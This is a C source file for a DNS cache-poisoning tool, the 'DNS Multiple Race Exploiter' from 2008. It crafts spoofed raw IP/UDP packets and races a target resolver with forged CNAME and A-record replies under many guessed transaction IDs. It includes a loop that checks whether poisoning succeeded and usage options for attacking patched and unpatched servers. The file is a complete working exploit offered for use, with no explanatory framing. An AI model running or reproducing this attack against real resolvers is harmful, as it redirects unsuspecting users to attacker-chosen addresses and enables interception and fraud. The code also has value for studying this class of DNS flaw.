/*
 * Project: DNS Multiple Race Exploiter
 * File Name: dns_mre.c
 *
 * Copyright (c) 2008 AR <ar@securebits.org>
 * Securebits [www.securebits.org]
 * ALL RIGHTS RESERVED.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/* My Include */
#include "./dns_mre.h"

int initialize( int *q_sockfd, int *r_sockfd )
{
	/* Local variables */
	char		*tok = NULL;
	int			one = 1;
	int			first = 1;
	struct name	*temp1 = NULL,
				*temp2 = NULL;

	printf("# Initializing...");

	/* Prepare the socket descriptions */
	if ((*q_sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP)) == -1)
	{
		perror("socket() error");
		exit(1);
	}

	if ((*r_sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP)) == -1)
	{
		perror("socket() error");
		exit(1);
	}

	/* Set IPPROTO_IP option: IP_HDRINC */
	if( setsockopt( *q_sockfd, IPPROTO_IP, IP_HDRINCL, (const int *) &one, sizeof(one) ) == -1 )
	{
		printf("setsockopt() IP_HDRINC\n");
		exit(1);
	}

	if( setsockopt( *r_sockfd, IPPROTO_IP, IP_HDRINCL, (const int *) &one, sizeof(one) ) == -1 )
	{
		printf("setsockopt() IP_HDRINC\n");
		exit(1);
		}

	/* Prepare the addresses */
	q_s_addr.sin_family = AF_INET;
	q_s_addr.sin_port = htons(Q_S_PORT);
	q_s_addr.sin_addr.s_addr = inet_addr( cfg.spoofed_ip );

	q_d_addr.sin_family = AF_INET;
	q_d_addr.sin_port = htons(Q_D_PORT);
	q_d_addr.sin_addr.s_addr = inet_addr( cfg.dns_server_ip );

	r_s_addr.sin_family = AF_INET;
	r_s_addr.sin_port = htons(R_S_PORT);
	r_s_addr.sin_addr.s_addr = inet_addr( cfg.name_server );

	r_d_addr.sin_family = AF_INET;
	r_d_addr.sin_port = htons(cfg.port);
	r_d_addr.sin_addr.s_addr = inet_addr( cfg.dns_server_ip );

	/* convert the hostname entered to a DNS Style */
	hostname  = (struct fqdn *) malloc( sizeof( struct fqdn ) );
	hostname->count = 0;
	hostname->size = 1;
	hostname->part = NULL;
	hostname->first_part = NULL;

	entryname = (struct fqdn *) malloc( sizeof( struct fqdn ) );
	entryname->count = 0;
	entryname->size = 1;
	entryname->part = NULL;
	entryname->first_part = NULL;

	tok = strtok( cfg.dns_entry_name, "." );
	while( tok != NULL )
	{
		if( first )
		{
			first = 0;
			temp1 = (struct name *) malloc( sizeof( struct name ) );
			if( cfg.type == 0 )
			{
				temp1->length = strlen( "aaaa" );
				temp1->name_part = (char *) malloc( strlen( "aaaa" ) + 1 );
				strcpy( temp1->name_part, "aaaa" );
			}else
			{
				temp1->length = strlen( "aaaaaaaa" );
				temp1->name_part = (char *) malloc( strlen( "aaaaaaaa" ) + 1 );
				strcpy( temp1->name_part, "aaaaaaaa" );
			}

			temp1->next = NULL;
			hostname->count++;
			hostname->size += temp1->length + 1;
			if( !hostname->first_part ) hostname->first_part = temp1;
			else hostname->part->next = temp1;
			hostname->part = temp1;
			temp1 = NULL;
		}else
		{
			temp1 = (struct name *) malloc( sizeof( struct name ) );
			temp1->length = strlen( tok );
			temp1->name_part = (char *) malloc( strlen( tok ) + 1 );
			strcpy( temp1->name_part, tok );
			temp1->next = NULL;
			hostname->count++;
			hostname->size += temp1->length + 1;
			if( !hostname->first_part ) hostname->first_part = temp1;
			else hostname->part->next = temp1;
			hostname->part = temp1;
			temp1 = NULL;
		}
		temp2 = (struct name *) malloc( sizeof( struct name ) );
		temp2->length = strlen( tok );
		temp2->name_part = (char *) malloc( strlen( tok ) + 1 );
		strcpy( temp2->name_part, tok );
		temp2->next = NULL;
		entryname->count++;
		entryname->size += temp2->length + 1;
		if( !entryname->first_part ) entryname->first_part = temp2;
		else entryname->part->next = temp2;
		entryname->part = temp2;
		temp2 = NULL;

		tok = strtok(NULL,".");
	}
	hostname->part = hostname->first_part;
	entryname->part = entryname->first_part;

	printf("[OK]\n");

	return 1;
}

int prepare_raw_one( u_int8_t *packet, int answer_flag )
{
	/* Local variables */
	u_int8_t *	ip4_pointer = NULL;
	u_int8_t *	udp_pointer = NULL;
	u_int8_t *	dns_pointer = NULL;
	int			dns_size;
	int			i;

	if( !answer_flag )
		printf("# Preparing query raw packet...");

	/* Set the pointers */
	ip4_pointer = packet;
	udp_pointer = packet + sizeof( struct ip4_hdr );
	dns_pointer = packet + sizeof( struct ip4_hdr ) + sizeof( struct udp_hdr );

	/* Prepare DNS header */
	dns_size = prepare_dns( dns_pointer, answer_flag, 0 );

	/* Prepare UDP header */
	prepare_udp( udp_pointer, dns_size, answer_flag );

	/* Prepare IP4 header */	
	prepare_ip4( ip4_pointer, dns_size + UDP_SIZE, answer_flag );

	if( !answer_flag )
		printf(".[OK]\n");

	ip4_pointer = NULL;
	udp_pointer = NULL;
	dns_pointer = NULL;

	return ( IP4_SIZE + UDP_SIZE + dns_size );
}

int prepare_raw_array( u_int8_t **packet, int answer_flag )
{
	/* Local variables */
	u_int8_t *	ip4_pointer = NULL;
	u_int8_t *	udp_pointer = NULL;
	u_int8_t *	dns_pointer = NULL;
	int			dns_size;
	int			i;

	if( !answer_flag )
		printf("# Preparing query raw packet...");
	if( answer_flag )
		printf("# Preparing %d reply raw packet(s)...", cfg.txids);

	for( i = 0; i < cfg.txids; i++ )
	{
		/* Set the pointers */
		ip4_pointer = packet[i];
		udp_pointer = packet[i] + sizeof( struct ip4_hdr );
		dns_pointer = packet[i] + sizeof( struct ip4_hdr ) + sizeof( struct udp_hdr );

		/* Prepare DNS header */
		dns_size = prepare_dns( dns_pointer, answer_flag, i );
		//printf("dns header...\n");
		/* Prepare UDP header */
		prepare_udp( udp_pointer, dns_size, answer_flag );

		/* Prepare IP4 header */	
		prepare_ip4( ip4_pointer, dns_size + UDP_SIZE, answer_flag );

		ip4_pointer = NULL;
		udp_pointer = NULL;
		dns_pointer = NULL;
	}

	printf(".[OK]\n");
	
	return ( IP4_SIZE + UDP_SIZE + dns_size );
}

int prepare_ip4( u_int8_t *hdr_pointer, int payload_size, int reply )
{
	/* Local variables */
	struct ip4_hdr *	header;

	/* Fill the IP header */
	header = (struct ip4_hdr *) hdr_pointer;

	header->ver_len		= 0x45;
	header->tos			= 0;
	header->total_len	= IP4_SIZE + payload_size;
	header->id			= htons(0x78AB);
	header->flags_off	= 0;
	header->ttl			= 255;
	header->protocol	= IPPROTO_UDP;
	header->checksum	= 0;
	if( reply )
	{
		header->src_ip		= r_s_addr.sin_addr.s_addr;
		header->dst_ip		= r_d_addr.sin_addr.s_addr;
	}else
	{
		header->src_ip		= q_s_addr.sin_addr.s_addr;
		header->dst_ip		= q_d_addr.sin_addr.s_addr;
	}

	header->checksum	= checksum( (u_int16_t *) hdr_pointer, (IP4_SIZE + payload_size)>>1 );

	return( IP4_SIZE + payload_size );
}

int prepare_udp( u_int8_t *hdr_pointer, int payload_size, int reply )
{
	/* Local variables */
	struct udp_hdr *	header;

	/* Fill the UDP header */
	header = (struct udp_hdr *) hdr_pointer;
	
	if( reply )
	{
		header->sport		= r_s_addr.sin_port;
		header->dport		= r_d_addr.sin_port;
	}else
	{
		header->sport		= q_s_addr.sin_port;
		header->dport		= q_d_addr.sin_port;
	}
	header->length		= htons(UDP_SIZE + payload_size);
	header->checksum	= 0; 

	return( UDP_SIZE + payload_size );
}

int prepare_dns( u_int8_t *payload, int answer_flag, int offset )
{
	/* Local Variables */
	int					i;
	int					payload_size;
	u_int8_t			*dns_hostname;
	u_int16_t			id_arr [cfg.txids];
	struct dns_hdr		*dns_header = NULL;
	struct query_RR		*query_rr = NULL;
	struct answer_RR	*answer_rr = NULL;
	struct cname_RR		*cname_rr = NULL;
	
	/* Seed the Randomizer */
	srand( (unsigned) time( NULL ) );
	/* Generate random TXIDs */
	for( i = 0; i < cfg.txids; i++ )
		id_arr [i] = (u_int16_t) rand();

	/* Compute the DNS header + payload size */
	payload_size = sizeof(struct dns_hdr) + hostname->size + sizeof(struct query_RR);
	if( answer_flag ) payload_size += sizeof(struct cname_RR) + entryname->size + sizeof( struct answer_RR );

	/* Construct the DNS query header */
	dns_header = (struct dns_hdr *) payload;
	
	if( answer_flag )
	{
		dns_header->txid	  = htons(id_arr[offset]);
		if( cfg.mode == 0 )
			dns_header->flags	  = htons(RFLAGS);
		else
			dns_header->flags	  = htons(0x8400);
		dns_header->qst_count = htons(0x0001);
		dns_header->ans_count = htons(0x0002);
	}else
	{	
		dns_header->txid	  = htons(QTXID);
		dns_header->flags	  = htons(QFLAGS);
		dns_header->qst_count = htons(0x0001);
		dns_header->ans_count = htons(0x0000);
	}
	dns_header->ath_count = htons(0x0000);
	dns_header->adt_count = htons(0x0000);

	/* Copy the DNS Style hostname */
	dns_hostname = payload + sizeof(struct dns_hdr);
	for( i = 0; i < hostname->count; i++ )
	{
		*dns_hostname = hostname->part->length;
		dns_hostname++;
		strcpy( dns_hostname, hostname->part->name_part );
		dns_hostname += hostname->part->length;
		hostname->part = hostname->part->next;
	}
	hostname->part = hostname->first_part;

	/* Construct the DNS question RR */
	query_rr = (struct query_RR *) ( payload + sizeof(struct dns_hdr) + hostname->size );

	query_rr->type		 = htons(0x0001);
	query_rr->clss		 = htons(0x0001);

	/* Construct the DNS answer RR if flag is set */
	if( answer_flag )
	{
		cname_rr = (struct cname_RR *) (payload + sizeof(struct dns_hdr) + hostname->size + sizeof(struct query_RR));
		cname_rr->name		= htons(0xC00C);
		cname_rr->type		= htons(0x0005);
		cname_rr->clss		= htons(0x0001);
		cname_rr->ttl		= htonl(0x7BEDABED);
		cname_rr->length	= htons(entryname->size);
		
		dns_hostname = (u_int8_t *) cname_rr + sizeof(struct cname_RR);
		for( i = 0; i < entryname->count; i++ )
		{
			*dns_hostname = entryname->part->length;
			dns_hostname++;
			strcpy( dns_hostname, entryname->part->name_part );
			dns_hostname += entryname->part->length;
			entryname->part = entryname->part->next;
		}
		entryname->part = entryname->first_part;

		answer_rr = (struct answer_RR *) (payload + sizeof(struct dns_hdr) + hostname->size + 
										  sizeof(struct query_RR)+ sizeof(struct cname_RR) + entryname->size );

		answer_rr->name		= htons(0xC000 | sizeof(struct dns_hdr) + hostname->size + sizeof(struct query_RR)+ sizeof(struct cname_RR));
		answer_rr->type		= htons(0x0001);
		answer_rr->clss		= htons(0x0001);
		answer_rr->ttl		= htonl(0x7BEDABED); 
		answer_rr->length	= htons(0004);
		answer_rr->addr		= inet_addr(cfg.dns_entry_ip);
	}

	dns_header = NULL;
	query_rr = NULL;
	answer_rr = NULL;
	cname_rr = NULL;

	return payload_size;
}

int launch_attack( int q_sockfd, u_int8_t *q_packet, int q_size,
				   int r_sockfd, u_int8_t **r_packet, int r_size )
{
	/* Local Variables */
	int						i = 0;
	int						l;
	int						q_pad = 0;
	int						r_pad = 0;
	int			flag = 0;
	u_int8_t				*q_byte, *qs_byte;
	u_int8_t				*r_byte, *rs_byte;
	u_int8_t				*q_psd_and_payload;
	u_int8_t				*r_psd_and_payload[ cfg.txids ];
	u_int16_t				*q_csum = NULL;
	u_int16_t				*r_csum = NULL;
	u_int32_t				max_iteration = 0x0000FFFF;
	struct udp_pseudo_hdr	*q_psd;
	struct udp_pseudo_hdr	*r_psd;
	
	/* Maximum number of iteration if attacking a patched system */
	if( cfg.type )
		max_iteration = 0xFFFFFFFF;

	/* if the UDP payload has a left-over byte, append 0x00 */
	if( q_size%2 != 0 ) q_pad = 1;
	if( r_size%2 != 0 ) r_pad = 1;

	/* Prepare UDP Checksum for the Query packet: PSD_UDP+UDP+DNS */
	q_csum = (u_int16_t *) (q_packet + IP4_SIZE + 6);
	q_psd_and_payload = (u_int8_t *) malloc( sizeof(struct udp_pseudo_hdr) + ( q_size + q_pad - IP4_SIZE ) );
	memset( q_psd_and_payload, 0, sizeof(struct udp_pseudo_hdr) + ( q_size + q_pad - IP4_SIZE ) );

	q_psd = (struct udp_pseudo_hdr *) q_psd_and_payload;
	q_psd->src_ip	 = q_s_addr.sin_addr.s_addr;
	q_psd->dst_ip	 = q_d_addr.sin_addr.s_addr;
	q_psd->res_proto = htons(0x0011);
	q_psd->length	 = htons(q_size - IP4_SIZE);
	memcpy( q_psd_and_payload + sizeof(struct udp_pseudo_hdr), q_packet + IP4_SIZE, q_size - IP4_SIZE );

	/* set the initial hostname to use, i.e., aaaa */
	q_byte = q_packet + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
	qs_byte = q_psd_and_payload + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
	*q_byte	    = *qs_byte     = 0x61;
	*(q_byte+1) = *(qs_byte+1) = 0x61;
	*(q_byte+2) = *(qs_byte+2) = 0x61;
	*(q_byte+3) = *(qs_byte+3) = 0x61;

	for( l = 0; l < cfg.txids; l++ )
	{

		/* Prepare the UDP Checksum for the Reply packet: PSD_UDP+UDP+DNS */
		r_psd_and_payload[ l ] = (u_int8_t *) malloc( sizeof(struct udp_pseudo_hdr) + ( r_size + r_pad - IP4_SIZE + 50) );
		memset( r_psd_and_payload[ l ], 0, sizeof(struct udp_pseudo_hdr) + ( r_size + r_pad - IP4_SIZE ) + 50 );

		r_psd = (struct udp_pseudo_hdr *) r_psd_and_payload[ l ];
		r_psd->src_ip	 = r_s_addr.sin_addr.s_addr;
		r_psd->dst_ip	 = r_d_addr.sin_addr.s_addr;
		r_psd->res_proto = htons(0x0011);
		r_psd->length	 = htons(r_size - IP4_SIZE);
		memcpy( r_psd_and_payload[ l ] + sizeof(struct udp_pseudo_hdr), r_packet[ l ] + IP4_SIZE, r_size - IP4_SIZE );

		/* set the initial hostname to use, i.e., aaaa */
		r_byte = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
		rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
		*r_byte     = *rs_byte     = 0x61;
		*(r_byte+1) = *(rs_byte+1) = 0x61;
		*(r_byte+2) = *(rs_byte+2) = 0x61;
		*(r_byte+3) = *(rs_byte+3) = 0x61;

		r_psd = NULL;
		r_byte = NULL;
		rs_byte = NULL;
	}

	printf("# Checking if the server is already poisoned...");
	fflush(stdout);
	if( check_poison() == 1 )
	{
		printf("Yes\n   The server is already poisoned\n");
		exit(1);
	}
	printf("No, it is not poisoned\n");
		
	printf("# Launching the Attack...\n"
	       "            maximum iternation %u\n"
	       "            wait time between each iteration is %d milliseconds\n"
	       "            wait time between the query and reply is %d milliseconds\n",
		max_iteration, WAIT_2, WAIT_1);
	
	printf("#");

	/* Send packets */
	for( i = 1; i <= max_iteration; i++ )
	{
		/* Calculate and set the UDP Checksum on the query and replies*/
		*q_csum = checksum( (u_int16_t *) q_psd_and_payload, (q_size + q_pad - IP4_SIZE + UDP_PSDS) >> 1 );
		for( l = 0; l < cfg.txids; l++ )
		{
			r_csum = (u_int16_t *) (r_packet[ l ] + IP4_SIZE + 6);
			*r_csum = checksum( (u_int16_t *) r_psd_and_payload[ l ], (r_size + r_pad - IP4_SIZE + UDP_PSDS) >> 1 );
			r_csum = NULL;
		}

		/* Send the Query Packet */
		send_packet( q_sockfd, q_packet, q_size, q_d_addr );
		usleep(WAIT_1);

		if( cfg.mode == 1 && !flag )
		{
			usleep(500);
			flag = 1;
		}
		/* Send the Reply Packets */
		for( l = 0; l < cfg.txids; l++ )
			send_packet( r_sockfd, r_packet[ l ], r_size, r_d_addr );
		
		//usleep(WAIT_2);
		
		if( i%100 == 0 )
		{
			printf("#");
			fflush(stdout);
		}
		if( i%3000 == 0 )
		{
			printf(" %d iterations\n", i);
			fflush(stdout);
			printf("Checking to see if the server is poisoned ....");
			fflush(stdout);
			if ( check_poison() )
			{
				printf("YES\n ** Attack is Successful **\n");
				fflush(stdout);
				exit(1);
			}
			printf("Not yet\n");
			fflush(stdout);
		}

		*q_byte += 1;
		*qs_byte += 1;

		for( l = 0; l < cfg.txids; l++ )
		{
			r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
			rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
			*r_byte  += 1;		*rs_byte += 1;
			r_byte  = NULL;		rs_byte = NULL;
		}

		if( *q_byte > 0x7a )
		{
			*q_byte  = 0x61;	*qs_byte = 0x61;
			*(q_byte+1)  +=1;	*(qs_byte+1) +=1;

			for( l = 0; l < cfg.txids; l++ )
			{

				r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
				rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
				*r_byte  = 0x61;	*rs_byte = 0x61;
				*(r_byte+1)  +=1;	*(rs_byte+1) +=1;
				r_byte  = NULL;		rs_byte = NULL;
			}

			if( *(q_byte+1) > 0x7a )
			{
				*(q_byte+1)  = 0x61;	*(qs_byte+1) = 0x61;
				*(q_byte+2)  +=1;		*(qs_byte+2) +=1;

				for( l = 0; l < cfg.txids; l++ )
				{
					r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
					rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
					*(r_byte+1)  = 0x61;	*(rs_byte+1) = 0x61;
					*(r_byte+2)  +=1;		*(rs_byte+2) +=1;
					r_byte  = NULL;			rs_byte = NULL;
				}

				if( *(q_byte+2) > 0x7a )
				{
					*(q_byte+2)  = 0x61;	*(qs_byte+2) = 0x61;
					*(q_byte+3)  +=1;		*(qs_byte+3) +=1;

					for( l = 0; l < cfg.txids; l++ )
					{
						r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
						rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
						*(r_byte+2)  = 0x61;	*(rs_byte+2) = 0x61;
						*(r_byte+3)  +=1;		*(rs_byte+3) +=1;
						r_byte  = NULL;			rs_byte = NULL;
					}

					if( *(q_byte+3) > 0x7a )
					{
						*(q_byte+3)  = 0x61;	*(qs_byte+3) = 0x61;
						*(q_byte+4)  +=1;		*(qs_byte+4) +=1;

						for( l = 0; l < cfg.txids; l++ )
						{
							r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
							rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
							*(r_byte+3)  = 0x61;	*(rs_byte+3) = 0x61;
							*(r_byte+4)  +=1;		*(rs_byte+4) +=1;
							r_byte  = NULL;			rs_byte = NULL;
						}

						if( *(q_byte+4) > 0x7a )
						{
							*(q_byte+4)  = 0x61;	*(qs_byte+4) = 0x61;
							*(q_byte+5)  +=1;		*(qs_byte+5) +=1;

							for( l = 0; l < cfg.txids; l++ )
							{
								r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
								rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
								*(r_byte+4)  = 0x61;	*(rs_byte+4) = 0x61;
								*(r_byte+5)  +=1;		*(rs_byte+5) +=1;
								r_byte  = NULL;			rs_byte = NULL;
							}

							if( *(q_byte+5) > 0x7a )
							{
								*(q_byte+5)  = 0x61;	*(qs_byte+5) = 0x61;
								*(q_byte+6)  +=1;		*(qs_byte+6) +=1;
								
								for( l = 0; l < cfg.txids; l++ )
								{
									r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
									rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
									*(r_byte+5)  = 0x61;	*(rs_byte+5) = 0x61;
									*(r_byte+6)  +=1;		*(rs_byte+6) +=1;
									r_byte  = NULL;			rs_byte = NULL;
								}

								if( *(q_byte+6) > 0x7a )
								{
									*(q_byte+6)  = 0x61;	*(qs_byte+6) = 0x61;
									*(q_byte+7)  +=1;		*(qs_byte+7) +=1;
									
									for( l = 0; l < cfg.txids; l++ )
									{
										r_byte  = r_packet[ l ] + sizeof( struct ip4_hdr) + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;	
										rs_byte = r_psd_and_payload[ l ] + UDP_PSDS + sizeof(struct udp_hdr) + sizeof(struct dns_hdr) + 1;
										*(r_byte+6)  = 0x61;	*(rs_byte+6) = 0x61;
										*(r_byte+7)  +=1;		*(rs_byte+7) +=1;
										r_byte  = NULL;			rs_byte = NULL;
									}

									if( *(q_byte+7) > 0x7a )
									{	
										/* We should never reached here */
										exit(1);
									}
								}
							}
						}
					}
				}
			}
		}
	      
	}
	printf("\n");
	printf("Number Queries/Replies: %d\n", i);

	return 1;
}

int send_packet( int sockfd, u_int8_t *packet, int size, struct sockaddr_in dst_addr )
{
	/* Send packet */
	if(sendto(sockfd, (const char *)packet, size, 0, 
		(struct sockaddr *) &dst_addr, sizeof( dst_addr )) == -1)
	{
		perror("sendto error");
		exit(1);
	}

	return 1;
}

int check_poison()
{
	/* Local Variables */
	int					i;
	int					sockfd;
	int					numbytes;
	int					payload_size;
	u_int8_t			*payload = NULL;
	u_int8_t			*dns_hostname = NULL;
	u_int8_t			message[200];
	struct dns_hdr		*dns_header = NULL;
	struct query_RR		*query_rr = NULL;
	struct answer_RR	*response = NULL;
	struct in_addr		response_addr;

	/* Prepare the UDP payload, i.e. DNS Header + DNS Data */
	payload_size = sizeof(struct dns_hdr) + entryname->size + sizeof(struct query_RR);
	payload = (u_int8_t *) malloc( payload_size );
	
	/* Construct the DNS query header */
	dns_header = (struct dns_hdr *) payload;
	dns_header->txid	  = htons(QTXID);
	dns_header->flags	  = htons(QFLAGS);
	dns_header->qst_count = htons(0x0001);
	dns_header->ans_count = htons(0x0000);
	dns_header->ath_count = htons(0x0000);
	dns_header->adt_count = htons(0x0000);

	/* Copy the DNS Style hostname */
	dns_hostname = payload + sizeof(struct dns_hdr);
	for( i = 0; i < entryname->count; i++ )
	{
		*dns_hostname = entryname->part->length;
		dns_hostname++;
		strcpy( dns_hostname, entryname->part->name_part );
		dns_hostname += entryname->part->length;
		entryname->part = entryname->part->next;
	}
	entryname->part = entryname->first_part;

	/* Construct the DNS question RR */
	query_rr = (struct query_RR *) ( payload + sizeof(struct dns_hdr) + entryname->size );

	query_rr->type		 = htons(0x0001);
	query_rr->clss		 = htons(0x0001);

	/* Initialize the socket */
	if( (sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
	{
		perror("socket()");
		exit(1);
	}

	/* Connect to the DNS Server */
	if(  connect(sockfd, (struct sockaddr *) &q_d_addr, sizeof( q_d_addr )) == -1 )
	{
		perror("connect()");
		exit(1);
	}

	/* Send the DNS Query */
	if( (numbytes = sendto(sockfd, (char *) payload, payload_size, 0,
		(struct sockaddr *)&q_d_addr, sizeof( q_d_addr ))) == -1 )
	{
		perror("sendto()");
		exit(1);
	}

	dns_header = NULL;	

	while(1)
	{
		/* Get the DNS Reply */
		if( (numbytes = recvfrom(sockfd, message, 199, 0, NULL, 0)) == -1 )
		{
			perror("recvfrom()");
			exit(1);
		}

		/* Check the Transaction ID */
		dns_header = (struct dns_hdr *) message;

		if( ntohs(dns_header->txid) == QTXID ) break;
	}
	
	if( (ntohs(dns_header->flags) & DNS_RESP) == DNS_RESP && ntohs(dns_header->ans_count) == 0x0001 )
	{
		response = (struct answer_RR *) ( message + sizeof(struct dns_hdr) + entryname->size + sizeof(struct query_RR) );
		response_addr.s_addr = response->addr;
				
		if( response->addr == inet_addr(cfg.dns_entry_ip) ) 
			return 1;
	}
	
	return (0);
}

u_int16_t checksum( u_int16_t *buf, int nwords )
{
	unsigned long sum;
	for (sum = 0; nwords > 0; nwords--)
		sum += *buf++;
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	
	return ~sum;
}

int usage( char *cmd )
{
	printf(
		"#######################################################\n"
		"#          DNS Multiple Race Exploiting Tool          #\n"
		"#######################################################\n\n");

	printf(
		"%s [arguments] <dns_entry_hostname> <dns_entry_ip>"
		" Arguments:\n"
		"    -t <target>		The target DNS server to poison (required)\n"
		"    -n <nameserver>	The Name Server used to impersonate (required)\n"
		"    -s <spoofed_ip>	A spoofed client IP address (optional)\n"
		"    -p <port>			Source port address used by target to send queries (required)\n"
		"    -y <type>			Type of the attack (optional; default 0)\n"
		"							0 for Unpatched Systems   1 for Patched Systems\n"
		"    -m <mode>			Attack mode (optional; default 0)\n"
		"							0 Attacking DNS servers configured with forwarders\n"
		"							1 Attacking DNS Servers that perform recursive queries\n"
		"    -x <no_txids>		Number of static Transaction IDs to use (optional; default 15)\n"
		"    -v					Verbosity\n"
		, cmd);
}





